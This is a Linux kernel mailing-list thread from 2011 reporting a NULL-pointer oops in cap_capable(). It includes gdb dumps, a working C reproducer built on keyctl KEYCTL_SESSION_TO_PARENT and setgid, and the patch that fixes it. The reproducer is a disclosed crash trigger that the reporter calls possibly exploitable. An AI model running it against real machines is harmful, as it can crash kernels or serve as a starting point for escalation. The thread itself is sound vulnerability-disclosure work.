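The loop writes 64 further 32-bit words after the first 16, so W must be at least 320 bytes. Whether the workspace passed in here is that large cannot be told from this backtrace alone.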

(gdb) bt
#0  sha_transform (digest=0xffff880120d61de8, in=0xffff880120d61ca8
"\372\223;4<;\030L\351\331_\345lI\206\362\202\364\373J\277\337\231ӌ!_(\206^\267\366\311\306\061R\001\v\b\322\312ګ\301\334:V\314p\226\253@\332m\206\271\025\361-\255f\027\340",
<incomplete sequence \364>,
    W=0xffff880120d61ca8) at lib/sha1.c:47
#1  0xffffffff814feb2d in extract_buf (r=0xffffffff82a88670,
out=0xffff880120d61e98 "\320S\032|\201\f7\215\333$") at
drivers/char/random.c:825
#2  0xffffffff814fee11 in extract_entropy_user (r=0xffffffff82a88670,
buf=0x7fec871ced98, nbytes=616) at drivers/char/random.c:910
#3  0xffffffff814fee95 in urandom_read (file=<value optimized out>,
buf=<value optimized out>, nbytes=<value optimized out>, ppos=<value
optimized out>) at drivers/char/random.c:1063
#4  0xffffffff8116200b in vfs_read (file=0xffff880121f13900,
    buf=0x7fec871ce000 ",\027\372\061\213L\224
\263\371\alx\304k\312O#\362\233\022\027\217\216\016\316
\212\022A`\213\264\246z$0=\313L<\253\221\367\264\246VF\350\336[a\372\v\367'\233\375\350\356\350\366\016\243wS\255fʦ\217\r\346k\354\235\335\031\333\335\030\246\061\332\312\020v\333\376\b\177-R]P\277\367\067M\230\324\235\026\264}\273Ƣ\264g\236\025\373\371\021a7tm\"f\313>I\003\346\214\006\255\"A\035\070\256\216\270t\002i\327\275\327G\031\227\017\337*\230H\376\256\a\376\t1XY\355*?{a\201s\272\023\060n\246\267\374\241/\205\037\330X\273\a[\300\220_\004#e\252B\326\370Kt(\306.D.\314\027"...,
count=<value optimized out>, pos=0xffff880120d61f58) at
fs/read_write.c:321
#5  0xffffffff811622a6 in sys_read (fd=<value optimized out>,
    buf=0x7fec871ce000 ",\027\372\061\213L\224
\263\371\alx\304k\312O#\362\233\022\027\217\216\016\316
\212\022A`\213\264\246z$0=\313L<\253\221\367\264\246VF\350\336[a\372\v\367'\233\375\350\356\350\366\016\243wS\255fʦ\217\r\346k\354\235\335\031\333\335\030\246\061\332\312\020v\333\376\b\177-R]P\277\367\067M\230\324\235\026\264}\273Ƣ\264g\236\025\373\371\021a7tm\"f\313>I\003\346\214\006\255\"A\035\070\256\216\270t\002i\327\275\327G\031\227\017\337*\230H\376\256\a\376\t1XY\355*?{a\201s\272\023\060n\246\267\374\241/\205\037\330X\273\a[\300\220_\004#e\252B\326\370Kt(\306.D.\314\027"...,
count=<value optimized out>) at fs/read_write.c:411
#6  <signal handler called>
#7  0x00007fec865e4340 in __brk_reservation_fn_dmi_alloc__ ()
#8  0xffff880120dc1770 in __brk_reservation_fn_dmi_alloc__ ()
#9  0xffffffff82a1bb50 in ?? ()
#10 0x0000000200020000 in __brk_reservation_fn_dmi_alloc__ ()
#11 0x0000000300000001 in __brk_reservation_fn_dmi_alloc__ ()
#12 0x00007ffffffff000 in __brk_reservation_fn_dmi_alloc__ ()
#13 0xffffffff810a4c3d in sys_restart_syscall () at kernel/signal.c:2085
#14 0x0000000000000000 in ?? ()

(gdb) info registers
rax            0xf21ac03a	4061839418
rbx            0xffff880120d61de8	-131936549462552
rcx            0x80	128
rdx            0xffff880120d61ca8	-131936549462872
rsi            0xffff880120d61ca8	-131936549462872
rdi            0xffff880120d61de8	-131936549462552
rbp            0xffff880120d61c98	0xffff880120d61c98
rsp            0xffff880120d61c58	0xffff880120d61c58
r8             0xbcc035f2	3166713330
r9             0x50	80
r10            0xffff880120d61cfc	-131936549462788
r11            0x47013d0b	1191263499
r12            0x10	16
r13            0xffffffff82a88670	-2102884752
r14            0xffff880120d61e98	-131936549462376
r15            0xa	10
rip            0xffffffff813d0297	0xffffffff813d0297 <sha_transform+39>
eflags         0x283	[ CF SF IF ]
cs             0x10	16
ss             0x18	24
ds             Could not fetch register "ds"; remote failure reply 'E22'
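
One way to sanity-check the "runs out of kernel stack" idea from the rsp value above. The sketch assumes 8 KiB, THREAD_SIZE-aligned kernel stacks on this x86_64 build. That is an assumption, though the oops elsewhere in this thread (RSP ffff880120d43ec8 with threadinfo ffff880120d42000) is consistent with it. The names are made up.

```c
#include <stdint.h>

/* Assumed kernel stack size for this build (x86_64, 2.6.39). */
#define THREAD_SIZE_SKETCH 8192ULL

/* Lowest address of the stack area containing rsp (where thread_info sits). */
static uint64_t stack_base(uint64_t rsp)
{
	return rsp & ~(THREAD_SIZE_SKETCH - 1);
}

/* Bytes consumed so far, counted from the top of the stack area. */
static uint64_t stack_bytes_used(uint64_t rsp)
{
	return stack_base(rsp) + THREAD_SIZE_SKETCH - rsp;
}

/* Bytes between rsp and the base; thread_info occupies part of this. */
static uint64_t stack_bytes_left(uint64_t rsp)
{
	return rsp - stack_base(rsp);
}
```

For rsp = 0xffff880120d61c58 this gives base 0xffff880120d60000, 0x3a8 (936) bytes used and 0x1c58 bytes left. If the 8 KiB assumption holds, this snapshot alone does not show the thread anywhere near the end of its stack. It says nothing about deeper call chains at other moments.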

(gdb) disassemble $pc
Dump of assembler code for function sha_transform:
   0xffffffff813d0270 <+0>:	push   rbp
   0xffffffff813d0271 <+1>:	xor    eax,eax
   0xffffffff813d0273 <+3>:	mov    rbp,rsp
   0xffffffff813d0276 <+6>:	push   r15
   0xffffffff813d0278 <+8>:	push   r14
   0xffffffff813d027a <+10>:	push   r13
   0xffffffff813d027c <+12>:	push   r12
   0xffffffff813d027e <+14>:	push   rbx
   0xffffffff813d027f <+15>:	sub    rsp,0x18
   0xffffffff813d0283 <+19>:	mov    ecx,DWORD PTR [rsi+rax*1]
   0xffffffff813d0286 <+22>:	bswap  ecx
   0xffffffff813d0288 <+24>:	mov    DWORD PTR [rdx+rax*1],ecx
   0xffffffff813d028b <+27>:	add    rax,0x4
   0xffffffff813d028f <+31>:	cmp    rax,0x40
   0xffffffff813d0293 <+35>:	jne    0xffffffff813d0283 <sha_transform+19>
   0xffffffff813d0295 <+37>:	xor    ecx,ecx
=> 0xffffffff813d0297 <+39>:	mov    eax,DWORD PTR [rdx+rcx*1+0x20]
   0xffffffff813d029b <+43>:	xor    eax,DWORD PTR [rdx+rcx*1+0x34]
   0xffffffff813d029f <+47>:	xor    eax,DWORD PTR [rdx+rcx*1+0x8]
   0xffffffff813d02a3 <+51>:	xor    eax,DWORD PTR [rdx+rcx*1]
   0xffffffff813d02a6 <+54>:	ror    eax,0x1f
   0xffffffff813d02a9 <+57>:	mov    DWORD PTR [rdx+rcx*1+0x40],eax
   0xffffffff813d02ad <+61>:	add    rcx,0x4


-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-23 18:28     ` Fwd: " Robert Święcki
@ 2011-05-24 19:52       ` Robert Święcki
  2011-05-25  8:28         ` [Security] " Eugene Teo
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-24 19:52 UTC (permalink / raw)
  To: linux-kernel; +Cc: security, kees, Tavis Ormandy

And the repro. I think this might be exploitable (a user-space NULL ptr
deref at first glance, in cap_capable() while in sys_setgid()).
Works for me with 2.6.39 and the following config:
http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt

It works for me with apparmor loaded, but looking at the code it
should work with SELinux as well (both call cap_capable()). Could be
some regression of http://securitytracker.com/id?1024384

It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
Ormandy's http://code.google.com/p/iknowthis/

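#define _GNU_SOURCE		/* for clone() and CLONE_VM in <sched.h> */
#include <sched.h>
#include <stdio.h>		/* perror() */
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/keyctl.h>

/* Child: ask the kernel to install its session keyring on the parent. */
int TH1(void *dummy) {
	syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
	syscall(__NR_exit, 0);
	return 0;	/* not reached */
}

int main(int argc, char **argv)
{
	char stack[1024 * 32];
	/* The stack grows down, so clone() gets the top of the buffer. */
	pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
	if (pid == -1) {
		perror("clone");
		return -1;
	}
	int status;
	/* __WALL: the child was cloned without SIGCHLD as its exit signal. */
	while(waitpid(pid, &status, __WALL) != pid);
	setgid(4286409707);
	return 0;
}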

Oops (stacktraces from the previous emails are also valid). Basically
'struct user_namespace *targ_ns' in cap_capable() is NULL.
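
On why a NULL targ_ns faults at 0x408 and not at 0: the access is to a member (targ_ns->creator in the quoted source line), so the fault address is the member's offset. The layout below is a guess that merely reproduces that offset on a 64-bit build (a 4-byte refcount plus padding, then 128 eight-byte hash heads). It is not copied from the kernel headers, and the _sketch names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for struct user_namespace; field sizes are assumed. */
struct user_namespace_sketch {
	uint32_t kref;			/* reference count */
	uint32_t pad;			/* alignment padding before the table */
	uint64_t uidhash_table[128];	/* 128 pointer-sized hash heads */
	uint64_t creator;		/* pointer to the creating user */
};

/* Address touched when reading a member through a given base pointer. */
static uint64_t member_fault_addr(uint64_t base, size_t member_offset)
{
	return base + member_offset;
}
```

offsetof(struct user_namespace_sketch, creator) is 0x408 here, so reading the member through a NULL base touches address 0x408, the address reported in the oops.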

[  288.431402] CPU 0
[  288.431402] Pid: 875, comm: apparmor Not tainted 2.6.39 #1 Dell
Inc.                 Precision WorkStation 390    /0GH911
[  288.431402] RIP: 0010:[<ffffffff8134cbdf>]  [<ffffffff8134cbdf>]
cap_capable+0x18/0x67
[  288.431402] RSP: 0018:ffff880120d43ec8  EFLAGS: 00010203
[  288.431402] RAX: ffff8801220ee0c0 RBX: 0000000000000001 RCX: 0000000000000006
[  288.431402] RDX: 0000000000000000 RSI: ffff880120ebb600 RDI: 0000000000000006
[  288.431402] RBP: ffff880120d43ec8 R08: 0000000000000001 R09: 000000000000005a
[  288.431402] R10: ffffffff813d42ea R11: 0000000000000246 R12: ffff880120ebb600
[  288.431402] R13: 0000000000000006 R14: ffff8801205aaee0 R15: 0000000000000000
[  288.431402] FS:  00007f919efc2720(0000) GS:ffff88012bc00000(0000)
knlGS:0000000000000000
[  288.431402] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[  288.431402] CR2: 0000000000000408 CR3: 00000001205de000 CR4: 00000000000006f0
[  288.431402] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  288.431402] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[  288.431402] Process apparmor (pid: 875, threadinfo
ffff880120d42000, task ffff8801205aaee0)
[  288.431402] Stack:
[  288.431402]  ffff880120d43f08 ffffffff81378bfb ffff880120d43ee8
ffff8801205aaee0
[  288.431402]  00000000ff7d6beb ffff880120ebb600 0000000000000000
0000000000000000
[  288.431402]  ffff880120d43f18 ffffffff8134d932 ffff880120d43f38
ffffffff8109d99d
[  288.431402] Call Trace:
[  288.431402]  [<ffffffff81378bfb>] apparmor_capable+0x27/0x61
[  288.431402]  [<ffffffff8134d932>] security_capable+0x2a/0x2c
[  288.431402]  [<ffffffff8109d99d>] ns_capable+0x3a/0x4f
[  288.431402]  [<ffffffff8109da2b>] nsown_capable+0x24/0x29
[  288.431402]  [<ffffffff810a6695>] sys_setgid+0x43/0x8d
[  288.431402]  [<ffffffff81ed4902>] system_call_fastpath+0x16/0x1b
[  288.431402] Code: c1 fe 05 d3 e0 48 63 f6 23 44 b2 38 c9 83 f8 01
19 c0 c3 55 48 89 e5 0f 1f 44 00 00 89 cf 48 81 fa f0 16 a2 82 74 0d
48 8b 46 70
[  288.431402]  39 82 08 04 00 00 74 3d 48 8b 46 70 48 3b 50 60 75 1d 89 f9
[  288.431402] RIP  [<ffffffff8134cbdf>] cap_capable+0x18/0x67
[  288.431402]  RSP <ffff880120d43ec8>
[  288.431402] CR2: 0000000000000408

(gdb) bt
#0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
#1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
security/apparmor/lsm.c:144
#2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
cred=<value optimized out>, cap=<value optimized out>) at
security/security.c:160
#3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
cap=<value optimized out>) at kernel/capability.c:381
#4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
kernel/capability.c:412
#5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
#6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
kernel/uid16.c:53

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-24 19:52       ` Robert Święcki
@ 2011-05-25  8:28         ` Eugene Teo
  2011-05-25 13:26           ` Robert Święcki
  0 siblings, 1 reply; 9+ messages in thread
From: Eugene Teo @ 2011-05-25  8:28 UTC (permalink / raw)
  To: Robert Święcki
  Cc: linux-kernel, security, kees, Tavis Ormandy, David Howells

Cc'ed David as well.

On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
> And the repro - I think this might be exploitable (user-space NULL ptr
> deref at the first glance, in cap_capable() while in sys_setgid()).
> Works for me with 2.6.39 and the following config:
> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
>
> It works for me with apparmor loaded, but looking at the code it
> should work with SELinux as well (both call cap_capable()). Could be
> some regression of http://securitytracker.com/id?1024384
>
> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
> Ormandy's http://code.google.com/p/iknowthis/
>
> #include <sys/stat.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <sys/syscall.h>
> #include <linux/keyctl.h>
> #include <linux/sched.h>
>
> int TH1(void *dummy) {
>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>        syscall(__NR_exit, 0);
> }
>
> int main(int argc, char **argv)
> {
>        char stack[1024 * 32];
>        pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
>        if (pid == -1) {
>                perror("clone");
>                return -1;
>        }
>        int status;
>        while(waitpid(pid, &status, __WALL) != pid);
>        setgid(4286409707);
>        return 0;
> }
> --
> Robert Święcki

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25  8:28         ` [Security] " Eugene Teo
@ 2011-05-25 13:26           ` Robert Święcki
  2011-05-25 14:44             ` Serge Hallyn
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-25 13:26 UTC (permalink / raw)
  To: Eugene Teo
  Cc: linux-kernel, security, kees, Tavis Ormandy, David Howells, serge.hallyn

On Wed, May 25, 2011 at 10:28 AM, Eugene Teo <eugeneteo@kernel.sg> wrote:
> Cc'ed David as well.
>
> On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
>> And the repro - I think this might be exploitable (user-space NULL ptr
>> deref at the first glance, in cap_capable() while in sys_setgid()).
>> Works for me with 2.6.39 and the following config:
>> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
>>
>> It works for me with apparmor loaded, but looking at the code it
>> should work with SELinux as well (both call cap_capable()). Could be
>> some regression of http://securitytracker.com/id?1024384
>>
>> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
>> Ormandy's http://code.google.com/p/iknowthis/

Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
names of functions involved, this change looks suspiciously related to
this oops (even if it just made the keyctl problem visible)
http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8

>> #include <sys/stat.h>
>> #include <sys/wait.h>
>> #include <unistd.h>
>> #include <sys/syscall.h>
>> #include <linux/keyctl.h>
>> #include <linux/sched.h>
>>
>> int TH1(void *dummy) {
>>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>>        syscall(__NR_exit, 0);
>> }
>>
>> int main(int argc, char **argv)
>> {
>>        char stack[1024 * 32];
>>        pid_t pid = clone(TH1, stack + sizeof(stack), CLONE_VM, NULL);
>>        if (pid == -1) {
>>                perror("clone");
>>                return -1;
>>        }
>>        int status;
>>        while(waitpid(pid, &status, __WALL) != pid);
>>        setgid(4286409707);
>>        return 0;
>> }

-- 
Robert Święcki

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 13:26           ` Robert Święcki
@ 2011-05-25 14:44             ` Serge Hallyn
  2011-05-25 14:52               ` Serge Hallyn
  2011-05-25 15:07               ` Robert Święcki
  0 siblings, 2 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 14:44 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Robert Święcki (robert@swiecki.net):
> On Wed, May 25, 2011 at 10:28 AM, Eugene Teo <eugeneteo@kernel.sg> wrote:
> > Cc'ed David as well.
> >
> > On Tue, May 24, 2011 at 8:52 PM, Robert Święcki <robert@swiecki.net> wrote:
> >> And the repro - I think this might be exploitable (user-space NULL ptr
> >> deref at the first glance, in cap_capable() while in sys_setgid()).
> >> Works for me with 2.6.39 and the following config:
> >> http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
> >>
> >> It works for me with apparmor loaded, but looking at the code it
> >> should work with SELinux as well (both call cap_capable()). Could be
> >> some regression of http://securitytracker.com/id?1024384
> >>
> >> It works with 2.6.39 but not with 2.6.39-rc4. Found with Tavis
> >> Ormandy's http://code.google.com/p/iknowthis/
> 
> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
> names of functions involved, this change looks suspiciously related to
> this oops (even if it just made the keyctl problem visible)
> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
> 
> >> #include <sys/stat.h>
> >> #include <sys/wait.h>
> >> #include <unistd.h>
> >> #include <sys/syscall.h>
> >> #include <linux/keyctl.h>
> >> #include <linux/sched.h>
> >>
> >> int TH1(void *dummy) {
> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);

Thanks!

Fooi, it looks like all users of cred_alloc_blank() may need to be
audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.

Does this fix the bug you're seeing?

From: Serge E. Hallyn <serge.hallyn@canonical.com>
Date: Wed, 25 May 2011 15:41:23 +0100
Subject: [PATCH 1/1] Set cred->user_ns in key_replace_session_keyring

Since this cred was not created with copy_creds(), it needs to get
initialized.

Signed-off-by: Serge E. Hallyn <serge.hallyn@canonical.com>
---
 security/keys/process_keys.c |    1 +
 1 files changed, 1 insertions(+), 0 deletions(-)

diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
index 6c0480d..92a3a5d 100644
--- a/security/keys/process_keys.c
+++ b/security/keys/process_keys.c
@@ -847,6 +847,7 @@ void key_replace_session_keyring(void)
 	new-> sgid	= old-> sgid;
 	new->fsgid	= old->fsgid;
 	new->user	= get_uid(old->user);
+	new->user_ns	= new->user->user_ns;
 	new->group_info	= get_group_info(old->group_info);
 
 	new->securebits	= old->securebits;
-- 
1.7.0.4
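
A minimal userspace sketch of the failure mode this patch addresses,
under simplified assumptions: a cred that starts out blank has a NULL
user_ns until something sets it, so a field-by-field copy that skips
user_ns leaves a pointer that a later capability check will
dereference. The *_model types and helper names are hypothetical
stand-ins, not the kernel's definitions:

```c
#include <stdlib.h>

struct user_namespace_model { int id; };
struct user_model { struct user_namespace_model *user_ns; };
struct cred_model {
	struct user_model *user;
	struct user_namespace_model *user_ns;
};

/* Stand-in for a blank allocation: every field starts out zeroed/NULL. */
static struct cred_model *cred_alloc_blank_model(void)
{
	return calloc(1, sizeof(struct cred_model));
}

/* Field-by-field copy; with_fix selects whether user_ns is also set. */
static void replace_cred_model(struct cred_model *new_cred,
			       const struct cred_model *old_cred, int with_fix)
{
	new_cred->user = old_cred->user;
	if (with_fix)	/* mirrors the one line added by the patch */
		new_cred->user_ns = new_cred->user->user_ns;
}

/* Returns 1 if a later check could safely read through user_ns. */
static int cred_is_usable(const struct cred_model *c)
{
	return c->user_ns != NULL;
}
```

Without the extra assignment, cred_is_usable() reports 0 for the new
cred, which corresponds to the NULL targ_ns seen in cap_capable().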


* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 14:44             ` Serge Hallyn
@ 2011-05-25 14:52               ` Serge Hallyn
  2011-05-25 15:07               ` Robert Święcki
  1 sibling, 0 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 14:52 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Serge Hallyn (serge.hallyn@canonical.com):
> Fooi, it looks like all users of cred_alloc_blank() may need to be
> audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.

Fortunately there appear to be no other users.

David, is there any other place that a cred gets created and used
without it coming from copy_creds()?

thanks,
-serge

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 14:44             ` Serge Hallyn
  2011-05-25 14:52               ` Serge Hallyn
@ 2011-05-25 15:07               ` Robert Święcki
  2011-05-25 15:28                 ` Serge Hallyn
  1 sibling, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-25 15:07 UTC (permalink / raw)
  To: Serge Hallyn
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

>> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
>> names of functions involved, this change looks suspiciously related to
>> this oops (even if it just made the keyctl problem visible)
>> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
>>
>> >> #include <sys/stat.h>
>> >> #include <sys/wait.h>
>> >> #include <unistd.h>
>> >> #include <sys/syscall.h>
>> >> #include <linux/keyctl.h>
>> >> #include <linux/sched.h>
>> >>
>> >> int TH1(void *dummy) {
>> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
>
> Thanks!
>
> Fooi, it looks like all users of cred_alloc_blank() may need to be
> audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.
>
> Does this fix the bug you're seeing?

Yup, the kernel survives both the testcase and a short syscall fuzzing
session. Thanks.

> From: Serge E. Hallyn <serge.hallyn@canonical.com>
> Date: Wed, 25 May 2011 15:41:23 +0100
> Subject: [PATCH 1/1] Set cred->user_ns in key_replace_session_keyring
>
> Since this cred was not created with copy_creds(), it needs to get
> initialized.
>
> Signed-off-by: Serge E. Hallyn <serge.hallyn@canonical.com>
> ---
>  security/keys/process_keys.c |    1 +
>  1 files changed, 1 insertions(+), 0 deletions(-)
>
> diff --git a/security/keys/process_keys.c b/security/keys/process_keys.c
> index 6c0480d..92a3a5d 100644
> --- a/security/keys/process_keys.c
> +++ b/security/keys/process_keys.c
> @@ -847,6 +847,7 @@ void key_replace_session_keyring(void)
>        new-> sgid      = old-> sgid;
>        new->fsgid      = old->fsgid;
>        new->user       = get_uid(old->user);
> +       new->user_ns    = new->user->user_ns;
>        new->group_info = get_group_info(old->group_info);
>
>        new->securebits = old->securebits;
> --
> 1.7.0.4

-- 
Robert Święcki

* Re: [Security] Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
  2011-05-25 15:07               ` Robert Święcki
@ 2011-05-25 15:28                 ` Serge Hallyn
  0 siblings, 0 replies; 9+ messages in thread
From: Serge Hallyn @ 2011-05-25 15:28 UTC (permalink / raw)
  To: Robert Święcki
  Cc: Eugene Teo, linux-kernel, security, kees, Tavis Ormandy, David Howells

Quoting Robert Święcki (robert@swiecki.net):
> >> Given that it doesn't seem to appear in 2.6.39-rc4, and judging by the
> >> names of functions involved, this change looks suspiciously related to
> >> this oops (even if it just made the keyctl problem visible)
> >> http://git.itanic.dy.fi/?p=linux-stable;a=commitdiff;h=47a150edc2ae734c0f4bf50aa19499e23b9a46f8
> >>
> >> >> #include <sys/stat.h>
> >> >> #include <sys/wait.h>
> >> >> #include <unistd.h>
> >> >> #include <sys/syscall.h>
> >> >> #include <linux/keyctl.h>
> >> >> #include <linux/sched.h>
> >> >>
> >> >> int TH1(void *dummy) {
> >> >>        syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT);
> >
> > Thanks!
> >
> > Fooi, it looks like all users of cred_alloc_blank() may need to be
> > audited wrt commit 47a150edc2ae734c0f4bf50aa19499e23b9a46f8.
> >
> > Does this fix the bug you're seeing?
> 
> Yup, the kernel survives both the testcase and a short syscall fuzzing
> session. Thanks.

Thanks, Robert.

David, assuming this gets your ack, do you mind pushing this one forward?

thanks,
-serge
